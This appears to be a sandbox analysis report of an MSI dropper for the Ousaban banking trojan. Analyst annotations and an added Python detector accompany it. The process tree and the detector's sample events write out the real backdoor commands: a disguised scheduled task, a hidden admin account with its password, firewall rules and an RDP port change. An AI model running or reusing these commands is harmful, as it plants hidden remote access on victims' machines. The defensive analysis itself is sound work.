Analysis
max time kernel: 149s
max time network: 149s
platform: windows10_x64
resource: win10-en-20211208
submitted: 23-12-2021 10:51
Static task: static1
Behavioral task: behavioral1
  Sample: seucartao0021 0iictl3q h6ozq5.msi
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: seucartao0021 0iictl3q h6ozq5.msi
  Resource: win10-en-20211208
General
Target: seucartao0021 0iictl3q h6ozq5.msi
Size: 4.0MB
MD5: 04573ca4c50c5c352ec0859d6a14953a
SHA1: 1a6780e61a658511f141fa8305ed9a9f318f5518
SHA256: 57675d518613f20edc235c2975eadba7aa15d19aa460df03b443c99cff0d26d1
SHA512: d2ac8b26969f25b9c4da413a54118bcfc181dd2bffdabc771119fb5837825d560807862ea4a75f0985b0e2c261d9678fc18a4975bb8c24399e5e248362d9664d
Malware Config
Signatures
suricata (Emerging Threats rules matched on the network capture):
- ET MALWARE Ousaban Banker Checkin M1
- ET MALWARE Ousaban Banker Checkin M2
- ET MALWARE Ousaban Banker KeepAlive
- ET MALWARE Ousaban Banker KeepAlive Response
- ET MALWARE Ousaban Banker Server Response M1
- ET MALWARE Ousaban Banker Server Response M2
Check-in, keep-alive and server-response rules all matched, so the C2 exchange completed in both directions during the run rather than stopping at an unanswered beacon.
Blocklisted process makes network request (2 IoCs)
flow  pid   Process
13    1120  MsiExec.exe
18    1120  MsiExec.exe
PID 1120 is the "MsiExec.exe -Embedding" custom-action server (see the process tree), so these requests are made by a custom action carried inside the MSI, not by the installer service itself.
Executes dropped EXE (2 IoCs)
pid   Process
2076  XvsLOegwgAvH.exe
1920  TLJTRGxbd.exe
Modifies RDP port number used by Windows (1 TTP)
Modifies Windows Firewall (1 TTP)
Sets DLL path for service in the registry (2 TTPs)
(No IoC rows are attached to these three signatures; the concrete reg.exe and netsh commands behind the first two are in the process tree.)
Drops startup file (1 IoC)
description   ioc                                                                                            Process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XIEAiogabmYY.lnk  MsiExec.exe
Loads dropped DLL (23 IoCs)
pid   Process           loads
1120  MsiExec.exe       4
2076  XvsLOegwgAvH.exe  10
1920  TLJTRGxbd.exe     7
3176  svchost.exe       1
1988  svchost.exe       1
PIDs 3176 and 1988 are the two "svchost.exe -k NetworkService -s TermService" instances in the process tree, i.e. the Remote Desktop service itself loaded a dropped DLL, consistent with the rdpwrap.dll written under Program Files being hooked in as the TermService DLL (the "Sets DLL path for service in the registry" TTP above).
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc                                                      Process
File opened (read-only)  \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J:  msiexec.exe
File opened (read-only)  \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R:  msiexec.exe
File opened (read-only)  \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:  msiexec.exe
Every drive letter except C: and D: was opened twice (24 letters x 2 = 48 IoCs), all by msiexec.exe. This is the Windows Installer service costing volumes during the install, not behaviour of the dropped payload, so the signature carries little weight on its own here.
Modifies WinLogon (2 TTPs, 1 IoC)
description      ioc                                                                                                     Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"  TLJTRGxbd.exe
AllowMultipleTSSessions=1 lets more than one terminal session run concurrently; together with the rdpwrap files below it is the standard RDP Wrapper setup for unattended remote logons alongside the victim's own session.
Drops file in Program Files directory (2 IoCs)
description   ioc                                                     Process
File created  C:\Program Files\Terminal Service 23122021\rdpwrap.ini  TLJTRGxbd.exe
File created  C:\Program Files\Terminal Service 23122021\rdpwrap.dll  TLJTRGxbd.exe
rdpwrap.dll and rdpwrap.ini are the RDP Wrapper Library, which patches TermService so that client editions of Windows accept RDP connections; the folder name embeds the run date (23122021), so the path will differ per infection and should be hunted by file name, not by the full path.
Drops file in Windows directory (11 IoCs)
description                   ioc                                                                   Process
File created                  C:\Windows\Installer\f75f667.msi                                      msiexec.exe
File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log              msiexec.exe
File opened for modification  C:\Windows\Installer\MSIF742.tmp                                      msiexec.exe
File opened for modification  C:\Windows\Installer\MSIFEF3.tmp                                      msiexec.exe
File opened for modification  C:\Windows\Installer\MSIFF52.tmp                                      msiexec.exe
File created                  C:\Windows\Installer\inprogressinstallinfo.ipi                        msiexec.exe
File opened for modification  C:\Windows\Installer\f75f667.msi                                      msiexec.exe
File opened for modification  C:\Windows\Installer\                                                 msiexec.exe
File created                  C:\Windows\Installer\SourceHash{2CF9BC1F-3B08-4ADD-99C9-AD880A202BE0} msiexec.exe
File opened for modification  C:\Windows\Installer\MSI538E.tmp                                      msiexec.exe
File opened for modification  C:\Windows\Installer\MSI549A.tmp                                      msiexec.exe
These are ordinary Windows Installer artifacts. The GUID in the SourceHash file name is the package's ProductCode, {2CF9BC1F-3B08-4ADD-99C9-AD880A202BE0}, which is a useful hunting key in the installer registry on other hosts; the cached copy C:\Windows\Installer\f75f667.msi preserves the original package for later analysis.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
(This is the sandbox's generic description for the signature. No process is attributed to it in this report, and the only drive enumeration attributed to a process above comes from msiexec.exe; nothing else in the run points at ransomware.)
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
1892  schtasks.exe
Modifies data under HKEY_USERS (15 IoCs)
description       ioc                                                                                                  Process
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"              LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"                LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"              LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"     LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"  LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"           LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"                 LogonUI.exe
Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent                     LogonUI.exe
Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History                     LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"   LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"                    LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"               LogonUI.exe
Set value (int)   \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"          LogonUI.exe
Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00  LogonUI.exe
Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM                                               LogonUI.exe
All 15 entries are DWM/theme colour settings written by LogonUI.exe under the .DEFAULT hive, i.e. logon-screen noise, not registry changes made by the sample.
Runs net.exe (see the "net user" and "net localgroup" commands in the process tree)
Script User-Agent (3 IoCs)
Uses user-agent string associated with script host/environment.
description             flow  ioc
HTTP User-Agent header  13    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  18    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  24    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Flows 13 and 18 are the MsiExec.exe (PID 1120) requests listed under "Blocklisted process makes network request". This user agent is the default sent by the WinHttp.WinHttpRequest COM object, which is what a VBScript/JScript custom action inside an MSI would use to fetch the payload; it is a cheap proxy-log hunt because browsers never send it.
Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid   Process           occurrences
1964  msiexec.exe       2
2076  XvsLOegwgAvH.exe  2
1988  svchost.exe       4
Suspicious behavior: LoadsDriver (1 IoC)
pid  Process
632  Process not Found
Suspicious use of AdjustPrivilegeToken (64 IoCs, grouped by process)
pid   Process      Tokens enabled
2620  msiexec.exe  SeShutdownPrivilege (x2), SeIncreaseQuotaPrivilege (x2), SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (31 entries)
1964  msiexec.exe  SeSecurityPrivilege, SeRestorePrivilege (x5), SeTakeOwnershipPrivilege (x5) (11 entries)
376   WMIC.exe     SeIncreaseQuotaPrivilege (x2), SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 entries; 33-36 are privilege LUIDs the sandbox did not resolve to names)
Broad token adjustment is normal for the Windows Installer client and service and for WMIC.exe, so this signature by itself is not evidence of privilege escalation; the privileges that matter here are the ones the SYSTEM-level installer service hands to the dropped binaries.
Suspicious use of FindShellTrayWindow (3 IoCs)
pid   Process
2620  msiexec.exe
1120  MsiExec.exe
2620  msiexec.exe
Suspicious use of SetWindowsHookEx (1 IoC)
pid   Process
1280  LogonUI.exe
Suspicious use of WriteProcessMemory (31 IoCs, grouped by parent/child)
pid   Process           wrote to  procid_target  count
1964  msiexec.exe       1120      70             3
1120  MsiExec.exe       376       72             3
2076  XvsLOegwgAvH.exe  1672      76             3
1672  cmd.exe           1892      78             3
2076  XvsLOegwgAvH.exe  1920      80             3
1920  TLJTRGxbd.exe     1820      85             2
1920  TLJTRGxbd.exe     2212      87             2
1920  TLJTRGxbd.exe     1044      89             2
1044  net.exe           4028      91             2
1920  TLJTRGxbd.exe     3164      92             2
3164  net.exe           884       94             2
1920  TLJTRGxbd.exe     1380      95             2
1920  TLJTRGxbd.exe     3860      97             2
Every row is a parent writing into the child it has just created (the target PID is the child in the process tree), so this signature records the launch chain rather than injection into an unrelated process.
Processes
Depth in brackets; child processes are indented under their parent, with the signatures attributed to each process listed beneath it.

[1] msiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\seucartao0021 0iictl3q h6ozq5.msi"
    image: C:\Windows\system32\msiexec.exe
    PID:2620
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    (The user-mode installer client launched on the submitted MSI.)

[1] C:\Windows\system32\msiexec.exe /V
    PID:1964
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    (The Windows Installer service, running as SYSTEM.)
    [2] C:\Windows\syswow64\MsiExec.exe -Embedding 63C9AB2F4B38CFDA11DBD125E88C318F
        PID:1120
        - Blocklisted process makes network request
        - Drops startup file
        - Loads dropped DLL
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        (The 32-bit custom-action server: it performs the two flagged downloads, writes the Startup-folder .lnk and launches the payload via WMI.)
        [3] "C:\Windows\System32\Wbem\WMIC.exe" process call create 'C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe'
            image: C:\Windows\SysWOW64\Wbem\WMIC.exe
            PID:376
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe
    PID:2076
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    (Shown as a new root rather than under MsiExec.exe because "wmic process call create" has WmiPrvSE.exe spawn the process, which breaks the parent/child link back to the installer; parent-based detections must account for this.)
    [2] "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU %USERNAME%
        image: C:\Windows\SysWOW64\cmd.exe
        PID:1672
        - Suspicious use of WriteProcessMemory
        [3] schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU Admin
            image: C:\Windows\SysWOW64\schtasks.exe
            PID:1892
            - Creates scheduled task(s)
            (Persistence: the dropper is re-run every 2 minutes, interactively, as the current user; cmd.exe expanded %USERNAME% to Admin before schtasks ran. The task name "OneDrive " carries a trailing space, a lookalike of a legitimate product name that also slips past an exact-match search for "OneDrive".)
    [2] "C:\Users\Admin\dSzzT 66G8\TLJTRGxbd.exe"
        PID:1920
        - Executes dropped EXE
        - Loads dropped DLL
        - Modifies WinLogon
        - Drops file in Program Files directory
        - Suspicious use of WriteProcessMemory
        [3] netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3456 profile=any action=allow
            image: C:\Windows\system32\netsh.exe
            PID:1820
        [3] netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3456 profile=any action=allow
            image: C:\Windows\system32\netsh.exe
            PID:2212
        [3] net user Administrat0r "123mudar" /add
            image: C:\Windows\system32\net.exe
            PID:1044
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\net1 user Administrat0r "123mudar" /add
                image: C:\Windows\system32\net1.exe
                PID:4028
        [3] net localgroup Administradores Administrat0r /add
            image: C:\Windows\system32\net.exe
            PID:3164
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\net1 localgroup Administradores Administrat0r /add
                image: C:\Windows\system32\net1.exe
                PID:884
        [3] netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3456 profile=any action=allow
            image: C:\Windows\system32\netsh.exe
            PID:1380
        [3] C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3456 /f
            PID:3860
        (Taken together this is a hidden RDP backdoor: the RDP listener is moved to port 3456, inbound TCP and UDP 3456 are allowed on every firewall profile under the innocuous rule name "Remote Desktop" (the TCP rule is added twice), and the account Administrat0r with password 123mudar is created and added to "Administradores". That is the Portuguese name of the Administrators group, consistent with Ousaban's Brazilian targeting; on this English-language sandbox image the group does not exist under that name, so the group add would not succeed here. The report does not record exit codes for any of these commands.)

[1] c:\windows\system32\svchost.exe -k networkservice -s TermService
    image: \??\c:\windows\system32\svchost.exe
    PID:3176
    - Loads dropped DLL

[1] C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    PID:1988
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    (Two TermService hosts in one run, each loading a dropped DLL, is consistent with the Remote Desktop service being restarted to pick up rdpwrap.dll from C:\Program Files\Terminal Service 23122021.)

[1] "LogonUI.exe" /flags:0x0 /state0:0xa3ad5855 /state1:0x41c64e6d
    image: C:\Windows\system32\LogonUI.exe
    PID:1280
    - Modifies data under HKEY_USERS
    - Suspicious use of SetWindowsHookEx
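Detection logic for the chain above, as an added example; it is not code from the sandbox vendor, from this report, or from the sample. It takes process-creation records in the pid / ppid / command-line shape of Sysmon Event ID 1 or Security event 4688, tags each command line with a rule for the behaviours seen in this run (RDP PortNumber change, inbound firewall allow on a port other than 3389, net user /add, admin-group add under localised group names, a schtasks every-N-minutes task running a binary from a user profile), and correlates the tags per process tree so that a backdoor verdict needs the port move, the firewall allow for that same port and a new local account together. The sample events are constructed from the command lines in the process tree; the regexes, the placeholder ppid 9999 standing in for the WmiPrvSE.exe parent that is absent from the capture, and the list of Administrators group names are assumptions to tune for your own telemetry.

```python
"""Detect the RDP-backdoor setup chain from the process tree above.

Added example for this page; not code from the sandbox vendor or the sample.
Input is process-creation telemetry (Sysmon EID 1 / Security 4688 shape:
pid, ppid, command line). Each rule tags one command line; hits are then
correlated per process tree so the verdict needs the port move, the firewall
allow for that same port and a new local account together. The regexes and
the admin-group names are assumptions to tune to your own telemetry.
"""
import re
from collections import defaultdict

RULES = [
    # reg add ...\Terminal Server\WinStations\RDP-Tcp /v PortNumber ... /d <port != 3389>
    ("rdp_port_changed", re.compile(
        r'\breg(?:\.exe)?\s+add\s+.*\\Terminal Server\\WinStations\\RDP-Tcp'
        r'.*?/v\s+PortNumber\b.*?/d\s+(?!3389\b)(\d+)', re.I)),
    # netsh advfirewall firewall add rule ... dir=in ... localport=<port != 3389>
    ("fw_inbound_allow", re.compile(
        r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*?\bdir=in\b'
        r'.*?\blocalport=(?!3389\b)(\d+)', re.I)),
    # net / net1 user <name> <password> /add
    ("local_user_added", re.compile(
        r'\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b', re.I)),
    # net / net1 localgroup <admins group; en, pt and fr names assumed> <name> /add
    ("added_to_admins", re.compile(
        r'\bnet1?(?:\.exe)?\s+localgroup\s+'
        r'(?:Administrators|Administradores|Administrateurs)\s+(\S+)\s+/add\b', re.I)),
    # schtasks /create /tn "<name>" ... /tr <binary under \Users\> ... /sc minute
    ("schtasks_minute_user_path", re.compile(
        r'\bschtasks\s+/create\b.*?/tn\s+"([^"]*)".*?/tr\s+\S*?'
        r'\\Users\\.*?/sc\s+minute\b', re.I)),
]


def classify(cmdline):
    """Return {tag: captured value} for every rule that matches one command line."""
    hits = {}
    for tag, rx in RULES:
        m = rx.search(cmdline)
        if m:
            hits[tag] = m.group(1)
    name = hits.get("schtasks_minute_user_path")
    if name is not None and name != name.strip():
        hits["task_name_padded"] = repr(name)   # "OneDrive " with a trailing space
    return hits


def root_of(pid, parents):
    """Follow ppid links up to the topmost process present in the event set."""
    seen = set()
    while parents.get(pid) in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def correlate(events):
    """Group hits by process-tree root; flag a tree as an RDP backdoor when the
    RDP port was moved, the firewall was opened for that same port and a local
    account was created. Group membership and the task are supporting context."""
    parents = {e["pid"]: e["ppid"] for e in events}
    per_tree = defaultdict(dict)
    for e in events:
        for tag, val in classify(e["cmdline"]).items():
            per_tree[root_of(e["pid"], parents)].setdefault(tag, set()).add(val)
    verdicts = {}
    for root, tags in per_tree.items():
        same_port = tags.get("rdp_port_changed", set()) & tags.get("fw_inbound_allow", set())
        verdicts[root] = {"tags": tags,
                          "rdp_backdoor": bool(same_port) and "local_user_added" in tags}
    return verdicts


# Constructed from the process tree in this report. XvsLOegwgAvH.exe was started
# through WMI, so its real parent (WmiPrvSE.exe) is absent from the capture;
# 9999 is a placeholder ppid. The last event is an unrelated admin opening 3389.
SAMPLE_EVENTS = [
    {"pid": 2076, "ppid": 9999, "cmdline": r'C:\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe'},
    {"pid": 1672, "ppid": 2076, "cmdline": r'"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU %USERNAME%'},
    {"pid": 1892, "ppid": 1672, "cmdline": r'schtasks /CREATE /TN "OneDrive " /TR C:\\Users\Admin\ZicJajftTbIk\XvsLOegwgAvH.exe /SC minute /MO 2 /IT /RU Admin'},
    {"pid": 1920, "ppid": 2076, "cmdline": r'"C:\Users\Admin\dSzzT 66G8\TLJTRGxbd.exe"'},
    {"pid": 1820, "ppid": 1920, "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3456 profile=any action=allow'},
    {"pid": 2212, "ppid": 1920, "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=udp localport=3456 profile=any action=allow'},
    {"pid": 1044, "ppid": 1920, "cmdline": 'net user Administrat0r "123mudar" /add'},
    {"pid": 4028, "ppid": 1044, "cmdline": r'C:\Windows\system32\net1 user Administrat0r "123mudar" /add'},
    {"pid": 3164, "ppid": 1920, "cmdline": 'net localgroup Administradores Administrat0r /add'},
    {"pid": 884,  "ppid": 3164, "cmdline": r'C:\Windows\system32\net1 localgroup Administradores Administrat0r /add'},
    {"pid": 3860, "ppid": 1920, "cmdline": r'C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3456 /f'},
    {"pid": 5000, "ppid": 4000, "cmdline": 'netsh advfirewall firewall add rule name="RDP" dir=in protocol=tcp localport=3389 action=allow'},
]

if __name__ == "__main__":
    for root, v in correlate(SAMPLE_EVENTS).items():
        print(root, "RDP backdoor" if v["rdp_backdoor"] else "no verdict", v["tags"])
```

Run it directly to print one verdict per process tree: the tree rooted at PID 2076 is flagged with all five tags plus the padded task name, while the unrelated 3389 rule produces no hit at all, which is the point of excluding the default port in the regexes. Correlating by tree root is deliberate for this sample, where everything hangs off the dropped payload; if an actor spreads the same steps across separate trees, key the hits by host and time window instead of by root_of.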